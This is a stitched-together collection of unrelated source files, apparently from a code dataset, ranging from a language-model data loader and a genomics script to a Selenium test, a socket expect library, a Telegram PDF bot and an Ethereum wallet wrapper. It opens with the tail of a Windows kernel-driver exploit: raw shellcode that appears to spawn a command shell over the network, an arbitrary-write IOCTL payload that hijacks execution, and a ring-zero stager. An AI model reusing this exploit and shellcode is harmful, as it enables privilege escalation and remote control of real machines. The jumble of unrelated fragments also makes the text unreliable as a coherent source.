"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0\xc3" )
sysbase = findSysBase(driver_name)
if not sysbase:
print "(-) Couldn't retrieve driver base address, exiting..."
sys.exit()
driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
driver_handle2 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
0, None, CREATE_ALWAYS, 0, None)
# .data memory area we write to; offset from base = 0x2e04
read_data_from= struct.pack('L', sysbase+0x2e04) # calculate addy in .data
# r0_address = noplsed address, jump 0xfa bytes ahead to avoid a corrupted nop
r0_address = struct.pack('L', sysbase+0x23fa)
evil_input = r0_address*2 + "\x90"*0x102
evil_input += ring0_migrate + ring0_msr + ring3_stager + ring3_shellcode
evil_input += "\x41"*0x549
evil_input += read_data_from + "\x42\x42\x42\x42" # bypass input checks
stor_input = "\x43\x43\x43\x43" # padding
stor_input += "\x07\xAD\xDE\xD0" # cmp dword ptr [eax], 0D0DEAD07h
stor_input += "\xBA\xD0\xBA\x10" # cmp dword ptr [eax+4], 10BAD0BAh
stor_input += "\x44\x44\x44\x44"*2
# After arbitrary write to memory nt!KeSetEvent is called: we need to fix
# nt!KeSetEvent+0x32 using any addy pointing to value different to 0x01
# so we can use our "read_data_from" again.
stor_input += read_data_from
stor_input += "\x44\x44\x44\x44"
# 0x2300 offset from base: we write here to control a function pointer
# and own EIP
stor_input += struct.pack('L', sysbase+0x2300) + "\x45"*414
# trigger these later on...
thread.start_new(pwnDrv, (driver_handle2, IOCTL_EIP, stor_input, stor_size,
stor_output, out_size, dwReturn1))
thread.start_new(kickLsass, ())
###########################################################################
# And now let's own the boy:
if driver_handle1:
# We store values to overcome input checks
print "(+) Storing our precious in kernel space ;) ..."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_STOR, stor_input,
stor_size, stor_output, out_size,
byref(dwReturn1), None)
# We trigger arbitrary write
print "(*) Sending evil IOCTL..."
print "(+) Pwnage in progress...."
dev_ioctl = kernel32.DeviceIoControl(driver_handle1, IOCTL_VULN,
evil_input, evil_size, evil_output,
evil_size,
byref(dwReturn2), None)
|
py | b4035a23b94f39666a6723711e3fb9520e08101e |
"""Utilities for parsing PTB text files."""
import collections
import os
import tensorflow as tf
def _read_words(filename):
with tf.gfile.GFile(filename, "rb") as f:
return list(f.read())
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data if word in word_to_id]
def ptb_raw_data(data_path=None):
"""Load PTB raw data from data directory "data_path".
Reads PTB text files, converts strings to integer ids,
and performs mini-batching of the inputs.
The PTB dataset comes from Tomas Mikolov's webpage:
http://www.fit.vutbr.cz/~imikolov/rnnlm/simple-examples.tgz
Args:
data_path: string path to the directory where simple-examples.tgz has
been extracted.
Returns:
tuple (train_data, valid_data, test_data, vocabulary)
where each of the data objects can be passed to PTBIterator.
"""
train_path = os.path.join(data_path, 'train')
valid_path = os.path.join(data_path, 'valid')
test_path = os.path.join(data_path, 'test')
word_to_id = _build_vocab(train_path)
print('vocabulary size:', len(word_to_id))
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
vocabulary = len(word_to_id)
print('data loaded')
return train_data, valid_data, test_data, vocabulary
def ptb_producer(raw_data, batch_size, num_steps, name=None):
"""Iterate on the raw PTB data.
This chunks up raw_data into batches of examples and returns Tensors that
are drawn from these batches.
Args:
raw_data: one of the raw data outputs from ptb_raw_data.
batch_size: int, the batch size.
num_steps: int, the number of unrolls.
name: the name of this operation (optional).
Returns:
A pair of Tensors, each shaped [batch_size, num_steps]. The second element
of the tuple is the same data time-shifted to the right by one.
Raises:
tf.errors.InvalidArgumentError: if batch_size or num_steps are too high.
"""
with tf.name_scope(name, "PTBProducer", [raw_data, batch_size, num_steps]):
raw_data = tf.convert_to_tensor(raw_data, name="raw_data", dtype=tf.int32)
data_len = tf.size(raw_data)
batch_len = data_len // batch_size
data = tf.reshape(raw_data[0 : batch_size * batch_len],
[batch_size, batch_len])
epoch_size = (batch_len - 1) // num_steps
assertion = tf.assert_positive(
epoch_size,
message="epoch_size == 0, decrease batch_size or num_steps")
with tf.control_dependencies([assertion]):
epoch_size = tf.identity(epoch_size, name="epoch_size")
i = tf.train.range_input_producer(epoch_size, shuffle=False).dequeue()
x = tf.slice(data, [0, i * num_steps], [batch_size, num_steps])
y = tf.slice(data, [0, i * num_steps + 1], [batch_size, num_steps])
return x, y |
py | b4035b1046f9b45afd97ae261ae793ebcf5189ca | import os
import sys
import numpy as np
import re
# 3 seconds
chr_all=['chr1','chr2','chr3','chr4','chr5','chr6','chr7','chr8','chr9','chr10','chr11','chr12','chr13','chr14','chr15','chr16','chr17','chr18','chr19','chr20','chr21','chr22','chrX']
tmp=[248956422,242193529,198295559,190214555,181538259,170805979,159345973,145138636,138394717,133797422,135086622,133275309,114364328,107043718,101991189,90338345,83257441,80373285,58617616,64444167,46709983,50818468,156040895]
chr_len={}
for i in np.arange(len(chr_all)):
chr_len[chr_all[i]]=tmp[i]
step_size=1000 # subsample ratio
sample_len=np.ceil(np.array(tmp)/step_size).astype(int)
path1='./sample_for_anchor_final/'
path2='./sample_for_anchor_final/'
os.system('mkdir -p ' + path2)
assay_all=['M01','M02','M16','M17','M18','M20','M22','M29']
for the_assay in assay_all:
ref=np.zeros(sum(sample_len))
count=0.0
for i in np.arange(1,52):
the_cell='C' + '%02d' % i
the_id = the_cell + the_assay
if os.path.isfile(path1 + 'sample_' + the_id + '.npy'):
print(the_id)
ref = ref + np.load(path1 + 'sample_' + the_id + '.npy')
count+=1.0
ref = ref/count
np.save(path2 + 'ref_' + the_assay, ref)
|
py | b4035be9470e546cdef014ac505da115f146eaed | # -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida_core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
# Default interval in seconds between calls
# This is used both in the work.transports.TransportQueue and in the
# transport.Transport class
# (unless replaced in plugins, as it actually is the case for SSH and local)
DEFAULT_TRANSPORT_INTERVAL = 30. |
py | b4035e3e4bf4f1a8e2634918ff3b4aa798607e7f | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
from scrapy import Field
class TaudemItem(scrapy.Item):
name = Field()
description = Field()
usage = Field()
syntax = Field()
parameters = Field()
options = Field()
manual_url = Field()
# category = Field()
pass
|
py | b4035f6fa316e307d0ced461f0b1c161d8a50425 | from django.contrib import admin
class CommonAdmin(admin.ModelAdmin):
list_per_page = 20
list_select_related = True
|
py | b4035f766626a5a33ed6b63a047842dd3df0dd4d | class PhaseThreeKey:
def __init__(self, corner_encoding, edge_encoding, parity):
self.corner_encoding = corner_encoding
self.edge_encoding = edge_encoding
self.parity = parity
def __eq__(self, other):
return self.corner_encoding == other.corner_encoding and self.edge_encoding == other.edge_encoding and self.parity == other.parity
def __hash__(self):
c_result = 0
for corner_code in self.corner_encoding:
c_result = 31 * c_result + corner_code
e_result = 0
for edge_code in self.edge_encoding:
e_result = 31 * e_result + edge_code
result = c_result
result = 31 * result + e_result
result = 31 * result + hash(self.parity)
return result
def __str__(self):
pass
|
py | b4035fc013a5194eed2997e197fe9397a8ffb8a3 | # -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
import time, unittest
def is_alert_present(wd):
try:
wd.switch_to_alert().text
return True
except:
return False
class test_add_group(unittest.TestCase):
def setUp(self):
self.wd = WebDriver()
self.wd.implicitly_wait(60)
def test_test_add_group(self):
success = True
wd = self.wd
wd.get("http://localhost/addressbook/group.php")
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys("admin")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys("secret")
wd.find_element_by_xpath("//form[@id='LoginForm']/input[3]").click()
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("Grupa 1")
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys("Nowa Grupa 1")
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys("Nowa Grupa 1")
wd.find_element_by_name("submit").click()
wd.find_element_by_link_text("group page").click()
wd.find_element_by_link_text("Logout").click()
self.assertTrue(success)
def tearDown(self):
self.wd.quit()
if __name__ == '__main__':
unittest.main()
|
py | b4035ff145944fd60dcab32d6dd5f967b7c1871e | '''
nexpect.py
Authors: Josh Christman and Nathan Hart
Version: 1.0.6
Date: 8 December 2013
Changelog (v1.0.6):
- Created new method: n.expectnl() which will expect a newline and not include the newline in the result it returns. I'm adding this because of
how often I do n.expect('\\n', incl=False)
Changelog (v1.0.5):
- Added a global recvsize variable which will a permanent change to the number of bytes received per test of the regexes in the expect modules.
- Rearranged some code to more efficiently use global variables recvsize and timeout
Changelog (v1.0.4):
- Fixed a bug in the expect method that was keeping the incl flag from working
- Made the sendline and send methods always cast the data to a str before doing anything
- This makes it possible to do sendline(1) and it send the number 1 and concatenate without having to cast to a string on the user side
'''
import threading,sys,socket,re,time
def spawn(sock, timeout=30, withSSL=False):
return nexpect(sock, timeout=timeout, withSSL=withSSL)
'''
The class nexpect is a socket expect module written using basic python modules. It should work on any
system with Python 2.7
'''
class nexpect():
'''
The constructor has one mandatory parameter:
sock - This can be either a tuple with an address and port to connect to, or a socket object.
Ex: s = nexpect(('www.example.com',1234))
s = nexpect(('123.123.123.123',1234))
sock = socket.socket()
sock.connect(('www.example.com',1234))
s = nexpect(sock)
Optional parameters are:
timeout - Sets the class timeout variable used as the timeout for the expect method
'''
def __init__(self, sock, timeout=30, recvsize=1, withSSL=False):
self.timeout = timeout
self.recvsize = recvsize
self.before = ''
self.matched = ''
if type(sock) == type(()):
self.socket = socket.socket()
if withSSL:
import ssl
self.socket = ssl.wrap_socket(self.socket)
self.socket.connect(sock)
elif type(sock) == type(socket.socket()):
self.socket = sock
else:
raise TypeError
'''
This method does nothing but call the send method of the socket and pass the data to the socket
'''
def send(self, data=''):
self.socket.sendall(str(data))
'''
This method appends a delimeter to the data and then sends it to the socket
Optional parameters are:
delimeter - Defaults to a '\n' but can be set to anything
'''
def sendline(self, data='', delimeter='\n'):
self.socket.sendall(str(data) + delimeter)
'''
A convience method to access the underlying socket's recv mechanism.
'''
def recv(self, num_bytes):
return self.socket.recv(num_bytes)
'''
This function takes a single regex in string form or a list/tuple of string regexes and receives data
on the socket until it matches the regex. If a single regex is passed in, only the data received is
returned from the function. If a list/tuple of regexes is passed in, the function returns a tuple of
the data and the index of the regex it matched. It will print the data that didn't match any regexes
if it times out so you can see why it didn't actually match any regexes.
Optional parameters are:
recvsize - the size of the data to receive each time through the loop. It defaults to 1 but can
be slow this way. Increase this if you know that the data being sent to you will be fairly regular.
timeout - a local timeout override to the class variable timeout. This can be used for a time when
you want a different timeout than the normal.
incl - a variable that you can set to false if you don't want the regex you're matching to be returned
as part of the data. Example: n.expect('>',incl=False) on "prompt >" would return "prompt "
'''
def expect(self, regex, recvsize=-1, timeout=-1, incl=True):
if recvsize == -1:
recvsize = self.recvsize
if timeout == -1:
timeout = self.timeout
isList = False
if type(regex) == type(()) or type(regex) == type([]):
isList = True
data = ''
t0 = time.time()
while True:
t1 = time.time()
elapsedTime = t1-t0 # Get the elapsed time since before the receive loop started
if elapsedTime > timeout: # Test the timeout
raise TimeoutException('Data received before timeout: "' + data + '"')
else:
# If it hasn't timed out, set the socket's timeout so that it won't block forever
self.socket.settimeout(timeout - elapsedTime)
# Now receive the data
try:
data += self.socket.recv(recvsize)
except:
# I know - catching an exception to raise another one means I'm evil. Sorry!
raise TimeoutException('Data received before timeout: "' + data + '"')
# Data was received - time to check the data to see if it matches the regexes
if isList: # Check if a list or tuple of regexes was passed in
for counter,reg in enumerate(regex): # Enumerate the regexes for testing
match = re.search(reg, data)
if match:
if not incl:
data = data.replace(match.group(0), "") # Will replace the match with a blank string
self.before = data
self.matched = reg
return data, counter # Return the data and the index of the regex found
else:
match = re.search(regex, data)
if match: # If only a single regex was passed in, return the data if it is found
if not incl:
data = data.replace(match.group(0),"") # Will replace the match with a blank string
self.before = data
self.matched = regex
return data
'''
The expectnl method just calls self.expect('\n',incl=False)
'''
def expectnl(self):
return self.expect('\n',incl=False)
'''
The interact method makes this into a netcat-like functionality. It will print whatever it receives
over the socket and send everything you type.
Optional parameters are:
delimeter - Specify a delimeter to be appended to all data sent over the socket. Defaults to a '\n'
'''
def interact(self, delimiter="\n"):
try:
r = self.recieverPrinter(self.socket)
r.daemon = True # ensure the thread quits when the main thread dies
r.start() # start the reciever thread
# enter the send loop
while True:
command = raw_input()
if command == "exit":
# die in a pretty manner
r.kill()
self.socket.sendall(command+delimiter)
return
self.socket.sendall(command+delimiter)
except KeyboardInterrupt:
r.kill()
return
except:
pass
def settimeout(self, timeout):
self.timeout = timeout
def start(self, connection_data):
self.socket = socket.socket()
self.socket.connect(connection_data)
def shutdown(self):
self.socket.close()
self.socket = None
class recieverPrinter(threading.Thread):
def __init__(self, socket):
super(nexpect.recieverPrinter, self).__init__()
self.socket = socket
self.socket.settimeout(0.5)
self.stop = False
def run(self):
while not self.stop:
try:
sys.stdout.write(self.socket.recv(1024))
sys.stdout.flush()
except:
pass
def kill(self):
self.stop = True
class TimeoutException(Exception):
def __init__(self, message=''):
Exception.__init__(self, message)
|
py | b40360e4519f54f928db2203bcbd23cb8e0facf9 | # fileName : plugins/toKnown.py
# copyright ©️ 2021 nabilanavab
from pyrogram.types import Message
from plugins.fileSize import get_size_format as gSF
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup
#--------------->
#--------> LOCAL VARIABLES
#------------------->
pdfInfoMsg = """`What shall i wanted to do with this file.?`
File Name : `{}`
File Size : `{}`
`Number of Pages: {}`✌️"""
#--------------->
#--------> EDIT CHECKPDF MESSAGE (IF PDF & NOT ENCRYPTED)
#------------------->
# convert unknown to known page number msgs
async def toKnown(callbackQuery, number_of_pages):
try:
fileName = callbackQuery.message.reply_to_message.document.file_name
fileSize = callbackQuery.message.reply_to_message.document.file_size
await callbackQuery.edit_message_text(
pdfInfoMsg.format(
fileName, await gSF(fileSize), number_of_pages
),
reply_markup = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
"⭐ get page No & info ⭐",
callback_data=f"KpdfInfo|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"To Images 🖼️",
callback_data=f"KtoImage|{number_of_pages}"
),
InlineKeyboardButton(
"To Text ✏️",
callback_data=f"KtoText|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"Encrypt 🔐",
callback_data=f"Kencrypt|{number_of_pages}"
),
InlineKeyboardButton(
"Decrypt 🔓",
callback_data=f"notEncrypted"
)
],
[
InlineKeyboardButton(
"Compress 🗜️",
callback_data=f"Kcompress"
),
InlineKeyboardButton(
"Rotate 🤸",
callback_data=f"Krotate|{number_of_pages}"
)
],
[
InlineKeyboardButton(
"Split ✂️",
callback_data=f"Ksplit|{number_of_pages}"
),
InlineKeyboardButton(
"Merge 🧬",
callback_data="merge"
)
],
[
InlineKeyboardButton(
"Stamp ™️",
callback_data=f"Kstamp|{number_of_pages}"
),
InlineKeyboardButton(
"Rename ✏️",
callback_data="rename"
)
]
]
)
)
except Exception as e:
print(f"plugins/toKnown: {e}")
# Telegram: @nabilanavab
|
py | b40360ffcf36a2a20607cc2e8adba1bf90e8f261 | #!/usr/bin/python3
import operator
import sys
import json
import os
sys.path.append(os.getcwd())
sys.path.append("{}".format(os.getcwd()))
sys.path.append("..")
import log
import log.logger
import traceback
import datetime
import sqlalchemy
import stmanage
import requests
import random
import comm
import comm.error
import comm.result
import comm.values
from comm import version
from comm.result import result, parse_except
from comm.error import error
from comm.functions import (
is_mnemonic,
output_args
)
from ethopt.ethproxy import (
ethproxy as clientproxy,
walletproxy,
VLSMPROOF_MAIN_NAME,
VLSMPROOF_DATAS_NAME,
VLSMPROOF_STATE_NAME
)
from enum import Enum
from baseobject import baseobject
import redis
import web3
from web3 import Web3
from ethopt.ethproxy import (
VLSMPROOF_MAIN_NAME,
contract_codes,
)
from comm.values import (
ETH_ADDRESS_LEN
)
#module name
name="eclient"
VLSMPROOF_MAIN_ADDRESS = contract_codes[VLSMPROOF_MAIN_NAME]["address"]
ETH_ADDRESS_LEN = comm.values.ETH_ADDRESS_LEN
class ethwallet(baseobject):
def __init__(self, name, wallet, chain="ethereum", main_address = None):
assert wallet is not None, "wallet is None"
baseobject.__init__(self, name)
self.__wallet = None
self.set_vlsmproof_main_address(main_address)
if wallet is not None:
ret = self.__load_wallet(wallet, chain)
if ret.state != error.SUCCEED:
raise Exception(f"load wallet[{wallet}] failed.")
def __del__(self):
pass
def set_vlsmproof_main_address(self, main_address):
if main_address:
VLSMPROOF_MAIN_ADDRESS = main_address
def __load_wallet(self, wallet, chain="ethereum"):
try:
self.__wallet_name = wallet
if os.path.isfile(wallet):
self.__wallet = walletproxy.load(wallet)
ret = result(error.SUCCEED, "", "")
elif is_mnemonic(wallet):
self.__wallet_name = None
self.__wallet = walletproxy.loads(wallet)
ret = result(error.SUCCEED, "", "")
else:
ret = result(error.SUCCEED, "not found wallet file", "")
raise Exception(f"not found {self.name()} wallet file({wallet})")
self.__wallet = walletproxy.new()
except Exception as e:
ret = parse_except(e)
return ret
def save(self):
try:
if self.__wallet is not None and self.__wallet_name:
self.__wallet.write_recovery(self.__wallet_name)
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
def dump_wallet(self):
try:
if self.__wallet is not None:
self.save()
self.__wallet = None
pass
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
@classmethod
def is_valid_address(self, address):
try:
ret = result(error.SUCCEED, datas = walletproxy.is_valid_address(address))
except Exception as e:
ret = parse_except(e)
return ret
def new_account(self):
try:
account = self.__wallet.new_account();
self.save()
ret = result(error.SUCCEED, "", account)
except Exception as e:
ret = parse_except(e)
return ret
def get_account_count(self):
return len(self.__wallet.accounts)
def is_main_contract_address(self, address):
return address == VLSMPROOF_MAIN_ADDRESS
def get_account(self, addressorid):
try:
if isinstance(addressorid, str) and addressorid == VLSMPROOF_MAIN_ADDRESS:
return result(error.SUCCEED, "", VLSMPROOF_MAIN_ADDRESS)
account = self.__wallet.get_account_by_address_or_refid(addressorid)
if account is None:
ret = result(error.ARG_INVALID)
else:
ret = result(error.SUCCEED, "", account)
except Exception as e:
ret = parse_except(e)
return ret
def find_account_by_address_hex(self, address):
return self.__wallet.find_account_by_address_hex(address)
def has_account_by_address(self, address):
try:
_, account = self.find_account_by_address_hex(address)
if account is None:
ret = result(error.SUCCEED, "", False)
else:
ret = result(error.SUCCEED, "", True)
except Exception as e:
ret = parse_except(e)
return ret
def has_account(self):
try:
self.__wallet.get_account_by_address_or_refid(0)
ret = result(error.SUCCEED, "", True)
except ValueError as e: #account count is 0, so not found account
ret = result(error.SUCCEED, "", False)
except Exception as e:
ret = parse_except(e)
return ret
def split_full_address(self, address, auth_key_prefix = None):
try:
ret = result(error.SUCCEED, datas = (None, address))
except Exception as e:
ret = parse_except(e)
return ret
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
class ethclient(baseobject):
def __init__(self, name, nodes, chain = "ethereum", usd_chain = True):
baseobject.__init__(self, name, chain)
self.__client = None
self.__node = None
if nodes is not None:
ret = self.conn_node(name, nodes, chain, usd_chain = usd_chain)
if ret.state != error.SUCCEED:
raise Exception(f"connect {chain} node failed.")
def __del__(self):
self.disconn_node()
def clientname(self):
return self.__client.clientname()
def load_vlsmproof(self, address):
self.__client.load_vlsmproof(address)
def load_contract(self, name):
self.__client.load_contract(name)
def set_contract_map_account(self, account):
self._sender_map_account = account
def map_account(self, account):
if isinstance(account, str) and account == VLSMPROOF_MAIN_ADDRESS:
return self._sender_map_account
return account
def conn_node(self, name, nodes, chain = "ethereum", usd_chain = False):
try:
if nodes is None or len(nodes) == 0:
return result(error.ARG_INVALID, repr(nodes), "")
for node in nodes:
try:
if self.work() == False:
return result(error.FAILED, f"connect {chain} work stop")
self._logger.debug("try connect node({}) : host = {} port = {} chain_id = {}".format( \
node.get("name", ""), node.get("host"), node.get("port"), node.get("chain_id", 42)))
client = clientproxy(host=node.get("host"), \
port=node.get("port"), \
usd_chain = usd_chain
)
#if not client.is_connected():
# self._logger.info(f"connect {chain} node failed({e}). test next...")
# continue
self._logger.debug(f"connect {chain} node succeed.")
except Exception as e:
parse_except(e)
self._logger.info(f"connect {chain} node failed({e}). test next...")
else:
self.__client = client
self.__node = node
return result(error.SUCCEED, "", "")
#not connect any violas node
ret = result(error.FAILED, f"connect {chain} node failed.", "")
except Exception as e:
ret = parse_except(e)
return ret
def stop(self):
self.work_stop()
def disconn_node(self):
try:
ret = result(error.SUCCEED)
except Exception as e:
ret = parse_except(e)
return ret
def get_syncing_state(self):
try:
ret = result(error.SUCCEED, datas = self.__client.syncing_state())
except Exception as e:
ret = parse_except(e)
return ret
def get_balance(self, account_address, token_id, module_address = None):
try:
balance = self.__client.get_balance(account_address, token_id)
ret = result(error.SUCCEED, "", balance)
except Exception as e:
ret = parse_except(e)
return ret
def get_balances(self, account_address):
try:
balance = self.__client.get_balances(account_address)
ret = result(error.SUCCEED, "", balance)
except Exception as e:
ret = parse_except(e)
return ret
def address_is_exists(self, address):
try:
state = self.__client.account_is_exists(address)
ret = result(error.SUCCEED, "", state)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_sequence(self, address):
try:
num = self.__client.get_sequence_number(address)
ret = result(error.SUCCEED, "", num)
except Exception as e:
ret = parse_except(e)
return ret
def get_transaction_version(self, address, sequence):
try:
num = self.__client.get_account_transaction_version(address, sequence)
ret = result(error.SUCCEED, "", num)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_version(self, address, sequence):
try:
ret = self.get_transaction_version(address, sequence)
if ret.state != error.SUCCEED:
return ret
ret = result(error.SUCCEED, "", ret.datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_address_latest_version(self, address):
try:
ver = self.__client.get_account_latest_version(address)
ret = result(error.SUCCEED, "", ver)
except Exception as e:
ret = parse_except(e)
return ret
def get_latest_transaction_version(self):
try:
datas = self.__client.get_latest_version()
ret = result(error.SUCCEED, "", datas - 1)
except Exception as e:
ret = parse_except(e)
return ret
def get_transactions(self, start_version, limit = 1, fetch_event=True):
try:
datas = self.__client.get_transactions(start_version, limit, fetch_event)
ret = result(error.SUCCEED, "", datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_transaction(self, version, fetch_event=True):
try:
datas = self.__client.get_transactions(version, 1 , fetch_event)
ret = result(error.SUCCEED, "", datas[0] if datas is not None else None)
except Exception as e:
ret = parse_except(e)
return ret
def get_rawtransaction(self, txhash):
try:
datas = self.__client.get_rawtransaction(txhash)
ret = result(error.SUCCEED, "", datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_transaction(self, version, fetch_event=True):
try:
datas = self.__client.get_transactions(version, 1 , fetch_event)
ret = result(error.SUCCEED, "", datas[0] if datas is not None else None)
except Exception as e:
ret = parse_except(e)
return ret
#the same to btc/violas get_decimals
def get_decimals(self, token_id):
return self.__client.get_decimals(token_id)
def create_data_for_end(self, flag, opttype, tranid, *args, **kwargs):
return {"type": "end", "flag": flag, "opttype":opttype, \
"version":kwargs.get("version", -1), "out_amount_real": kwargs.get("out_amount_real", 0)}
def create_data_for_stop(self, flag, opttype, tranid, *args, **kwargs):
return {"type": "stop", "flag": flag, "opttype":opttype, \
"version":kwargs.get("version", -1)}
def create_data_for_mark(self, flag, dtype, id, version, *args, **kwargs):
return {"type": "mark", "flag": flag, "version":version }
@output_args
def approve(self, account, to_address, amount, token_id, **kwargs):
try:
datas = self.__client.approve(account, to_address, amount, token_id, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
@output_args
def allowance(self, from_address, to_address, token_id, **kwargs):
try:
datas = self.__client.allowance(from_address, to_address, token_id, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
@output_args
def send_proof(self, account, token_id, datas, **kwargs):
try:
datas = self.__client.send_proof(account, token_id, datas, **kwargs)
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
def send_coin_erc20(self, account, toaddress, amount, token_id, *args, **kwargs):
return self.send_coin(account, toaddress, amount, token_id, data= {"type":"mark", "version": None},*args, **kwargs)
def send_coin(self, account, toaddress, amount, token_id, data, *args, **kwargs):
'''change state
'''
try:
sender_account = self.map_account(account)
if data["type"] in ("end", "stop"):
datas = self.__client.update_proof_state(sender_account, data["version"], data["type"])
elif data["type"] == "mark":
datas = self.__client.send_token(sender_account, toaddress, amount, token_id)
else:
raise Exception(f"type{type} is invald.")
ret = result(error.SUCCEED if len(datas) > 0 else error.FAILED, "", datas = datas)
self._logger.debug(f"result: {ret.datas}")
except Exception as e:
ret = parse_except(e)
return ret
def get_token_list(self):
try:
ret = result(error.SUCCEED, datas = self.__client.token_name_list())
except Exception as e:
ret = parse_except(e)
return ret
def get_proof_contract_address(self, name):
try:
datas = None
if name == "main":
datas = self.__client.token_address(VLSMPROOF_MAIN_NAME)
elif name == "datas":
datas = self.__client.token_address(VLSMPROOF_DATAS_NAME)
elif name == "state":
datas = self.__client.token_address(VLSMPROOF_STATE_NAME)
else:
raise ValueError(f"name({name}) is invalid.")
ret = result(error.SUCCEED, datas = datas)
except Exception as e:
ret = parse_except(e)
return ret
def get_chain_id(self):
try:
ret = result(error.SUCCEED, datas = self.__client.get_chain_id())
except Exception as e:
ret = parse_except(e)
return ret
def get_token_min_amount(self, token_id):
try:
ret = result(error.SUCCEED, datas = self.__client.get_token_min_amount(token_id))
except Exception as e:
ret = parse_except(e)
return ret
def get_token_max_amount(self, token_id):
try:
ret = result(error.SUCCEED, datas = self.__client.get_token_max_amount(token_id))
except Exception as e:
ret = parse_except(e)
return ret
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
return self.__client
def main():
pass
if __name__ == "__main__":
main()
|
py | b403610d3ad6dfb77e30afae83addf375798ab47 |
import os, imp, getpass, sys, traceback, re
from pprint import pprint
from twisted.python.filepath import FilePath
from twisted.internet.task import react
from twisted.internet import reactor
from twisted.internet.endpoints import UNIXClientEndpoint
from twisted.conch.ssh.keys import EncryptedKeyError, Key
from twisted.conch.client.knownhosts import KnownHostsFile
from twisted.python import log as logger
import click
from structlog import PrintLogger
log = PrintLogger()
from plait.app.console import ConsoleApp
from plait.app.terminal import TerminalApp
from plait.runner import PlaitRunner
from plait.task import NoSuchTaskError, task
from plait.errors import *
from plait.utils import parse_task_calls, Bag
def findPlaitfile(path=os.getcwd()):
files = os.listdir(path)
parent = os.path.dirname(path)
if 'plaitfile.py' in files:
fullpath = os.path.join(path, 'plaitfile.py')
return os.path.abspath(fullpath)
elif parent != path:
return findPlaitfile(parent)
raise StartupError("Couldn't find plaitfile.py")
def importPlaitfile(filename):
try:
err = None
return imp.load_source('plaitfile', filename)
except Exception as e:
e = StartupError("Couldn't import plaitfile")
e.tb = traceback.format_exc()
raise e
def gatherTasks(tasks, pf_module):
parsed_tasks = parse_task_calls(tasks)
for task_name, args, kwargs in parsed_tasks:
task_func = getattr(pf_module, task_name, None)
if not task_func:
error = "Task `{}` does not exist in pf_module: {}"
error = error.format(task_name, pf_module.__file__)
raise NoSuchTaskError(error)
task_func = task(task_func)
